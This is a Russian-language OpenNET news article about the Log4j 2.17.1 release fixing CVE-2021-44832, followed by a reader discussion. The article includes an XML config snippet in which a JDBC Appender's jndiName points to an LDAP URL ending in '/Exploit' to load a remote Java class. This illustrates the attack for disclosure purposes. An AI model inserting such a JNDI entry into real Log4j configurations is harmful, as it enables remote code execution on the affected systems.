The OpenNET Project / Index page

[ новости /+++ | форум | wiki | теги | ]

Обновление Log4j 2.17.1 с устранением ещё одной уязвимости

29.12.2021 10:16

Опубликованы корректирующие выпуски библиотеки Log4j 2.17.1, 2.3.2-rc1 и 2.12.4-rc1, в которых устранена ещё одна уязвимость (CVE-2021-44832). Упоминается, что проблема позволяет организовать удалённое выполнение кода (RCE), но при этом помечена как неопасная (CVSS Score 6.6) и в основном представляет лишь теоретический интерес, так как требует специфичных условий для эксплуатации - атакующий должен иметь возможность внести изменение в файл с настройками Log4j, т.е. должен иметь доступ к атакуемой системе и полномочия изменять значение параметра конфигурации log4j2.configurationFile или вносить изменения в существующие файлы c настройками для ведения лога.

Атака сводится к определению на локальной системе конфигурации на базе JDBC Appender, ссылающейся на внешний JNDI URI, при запросе которого может быть возвращён Java-класс для исполнения. По умолчанию JDBC Appender не настроен для обработки протоколов, отличных от Java, т.е. без изменения конфигурации атака невозможна. Кроме того, проблема проявляется только в JAR-файле log4j-core и не затрагивает приложения, использующие JAR-файл log4j-api без log4j-core.


   <Appenders>
	<JDBC name="databaseAppender" tableName="dbo.application_log">
             <DataSource jndiName="ldap://127.0.0.1:1389/Exploit"/>
             ...
	</JDBC>
  </Appenders>


  1. Главная ссылка к новости (https://www.openwall.com/lists...)
  2. OpenNews: Третья уязвимость в Log4j 2. Проблемы в Log4j затрагивают 8% Maven-пакетов
  3. OpenNews: Новый вариант атаки на Log4j 2, позволяющий обойти добавленную защиту
  4. OpenNews: 17 проектов Apache оказались затронуты уязвимостью в Log4j 2
  5. OpenNews: Критическая уязвимость в Apache Log4j 2, затрагивающая многие Java-проекты
Лицензия: CC-BY
Тип: Проблемы безопасности
Короткая ссылка: https://opennet.ru/56428-log4j
Ключевые слова: log4j, java
При перепечатке указание ссылки на opennet.ru обязательно


Обсуждение (27) Ajax | 1 уровень | Линейный | +/- | Раскрыть всё | RSS
  • 1.1, макпыф (ok), 10:21, 29/12/2021 [ответить] [﹢﹢﹢] [ · · · ]  
  • +7 +/
    Помнится не так давно была неделя дыр в ebpf. Теперь вот log4j

     
     
  • 2.4, ryoken (ok), 11:22, 29/12/2021 [^] [^^] [^^^] [ответить]  
  • +3 +/
    Да-да, ещё вот про дуршлаги в Интеле давно не писали, прям странно :D.
     

  • 1.2, Аноним (2), 10:49, 29/12/2021 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    миллионы глаз находят дыры даже там, где раньше в упор не видели.
     
     
  • 2.3, Аноним (3), 11:13, 29/12/2021 [^] [^^] [^^^] [ответить]  
  • +3 +/
    Миллионы дыр прячутся от миллиона глаз - кто кого?
     
     
  • 3.5, FreeStyler (ok), 11:27, 29/12/2021 [^] [^^] [^^^] [ответить]  
  • +/
    вечная борьба, как и эволюция
     
     
  • 4.6, Царь (?), 11:38, 29/12/2021 [^] [^^] [^^^] [ответить]  
  • +2 +/
    Лимит на эволюцию исчерпан
     
     
  • 5.9, псевдонимус (?), 12:25, 29/12/2021 [^] [^^] [^^^] [ответить]  
  • +/
    Судя по последним событиям, да. И это чудесно )
     
  • 5.10, псевдонимус (?), 12:28, 29/12/2021 [^] [^^] [^^^] [ответить]  
  • +/
    Но тыплохого не подумай, я люблю господина ПЖ!

    ЗЫ: что за беда -- то горшков под ёлку навалит, то в новостях вот это все..

     
  • 2.7, OpenBotNET (ok), 11:41, 29/12/2021 [^] [^^] [^^^] [ответить]  
  • +1 +/
    Миллионам глаз плевать на корпоративную Java.
     
     
  • 3.11, псевдонимус (?), 12:30, 29/12/2021 [^] [^^] [^^^] [ответить]  
  • +/
    А миллионам юзеров нет. Потому засуньте свои гляделки обратно в ЛПУ, где они и прибывали.
     
     
  • 4.20, Аноним (-), 21:18, 29/12/2021 [^] [^^] [^^^] [ответить]  
  • +/
    Значит теперь у кого-то будет миллионный ботнет из этих юзеров, что ж поделать, участь у лохов такая. А они будут с невинной мордой вещать - "ой чойта меня везде зобанили и капчи кажут?!"
     
  • 3.12, псевдонимус (?), 12:31, 29/12/2021 [^] [^^] [^^^] [ответить]  
  • +/
    >Жопу

    Самофикс.

     

  • 1.8, Аноним (8), 12:23, 29/12/2021 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    Надо обязательно обесклычивать данные прежде чем записывать в лог
     
  • 1.13, Ведмед (?), 13:15, 29/12/2021 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    "А вот признайся, мужык - ты ведь сюда не на охоту ходишь?!"
     
  • 1.14, Винтажный газогенератор (?), 13:21, 29/12/2021 [ответить] [﹢﹢﹢] [ · · · ]  
  • +3 +/
    Казалось бы, надо всего лишь - взять строчку и записать ее в файл. Ну в крайнем случае по сислогу ее в сеть пульнуть. Но нет, надо накрутить вокруг этого свистоперделок. И вот результат.
     
     
  • 2.15, ms is piese of s (?), 16:11, 29/12/2021 [^] [^^] [^^^] [ответить]  
  • –1 +/
    Сценариев ведения логов больше одного, это может быть запись в бд, по сети, кастомный коннектор и черт в ступе. Естественно, в большинестве случаев такая функциональность избыточна, особенно на локалхосте, но тем не менее, вероятно многие проекты тянут неосознанно или прилетает в зависимостях используют 2-ю версию, когде есть дубовая 1-я версия для простого случая. Не нужно забывать, что есть и по умолчании логер в самой JDK и можно обойтись без лог4ж вообще.
     
     
  • 3.17, Аноним (17), 20:11, 29/12/2021 [^] [^^] [^^^] [ответить]  
  • +/
    Ммм я не знаю насчёт сабжа, но возможность управлять подробностью логов на уровне подключаемых модулей это красиво. Особенно, на локалхосте. Принтов конечно хватит всем, но вот способность батарейки контролировать многого стоит. Скажем, в питоне с логами всё красиво, насколько я знаю, вдохновлялись именно жабой.
     
     
  • 4.19, Онаним (?), 21:17, 29/12/2021 [^] [^^] [^^^] [ответить]  
  • –2 +/
    На уровне загружаемых от любого васяна подключаемых модулей?
    Не, спасибо.
     
     
  • 5.24, Аноним (17), 11:24, 30/12/2021 [^] [^^] [^^^] [ответить]  
  • +/
    Если Васяну надо, то да, но вообще это уже зависит от Васяна, какую он информацию будет выводить, а ты только выбираешь подробность, и куда отправить. Батарейки всё больше от серьёзных организаций и имеют широкое применение в продакшене, так что стандарты на уровне. Это же не жс с его рекламой в логах.
     
     
  • 6.26, Онаним (?), 13:15, 30/12/2021 [^] [^^] [^^^] [ответить]  
  • +/
    ЫЫы, в случае log4j внезапно выяснилось, что выбирает, что загрузить, другой васян :D
     
  • 4.21, Аноним (-), 00:41, 30/12/2021 [^] [^^] [^^^] [ответить]  
  • +/
    Бррр, красиво, говоришь?
    В питоне много где джависты нарукожопили со своим менталитетом.
     
  • 3.25, Аноним (8), 12:17, 30/12/2021 [^] [^^] [^^^] [ответить]  
  • +/
    Безопасная запись в бд с помощью подготовленных выражений доступна в java из коробки.
     
  • 2.16, лютый жабби__ (?), 17:46, 29/12/2021 [^] [^^] [^^^] [ответить]  
  • +/
    >Казалось бы, надо всего лишь - взять строчку и записать ее в файл

    Скорее да, чем нет. И у таких проектов log4j2 не используется )

     

  • 1.18, Аноним (-), 21:16, 29/12/2021 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    Извините, я запутался, это которая по счету дырка в этой штуке?
     
     
  • 2.22, Онаним (?), 00:46, 30/12/2021 [^] [^^] [^^^] [ответить]  
  • +1 +/
    n+1'я
     

  • 1.23, Аноним (23), 09:38, 30/12/2021 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    Ни дня без новых уязвимостей log4j
     
  • 1.29, Pilat (ok), 13:34, 01/01/2022 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    Вроде и открытые исходники, и миллионы пользователей... и всё равно никто не посмотрел в эти исходники.
    Всё что требовалось - записать строчку в лог. Записали...
     

     Добавить комментарий
    Имя:
    E-Mail:
    Текст:



    Спонсоры:
    PostgresPro
    Inferno Solutions
    Hosting by Hoster.ru
    Хостинг:

    Закладки на сайте
    Проследить за страницей
    Created 1996-2022 by Maxim Chirkov
    Добавить, Поддержать, Вебмастеру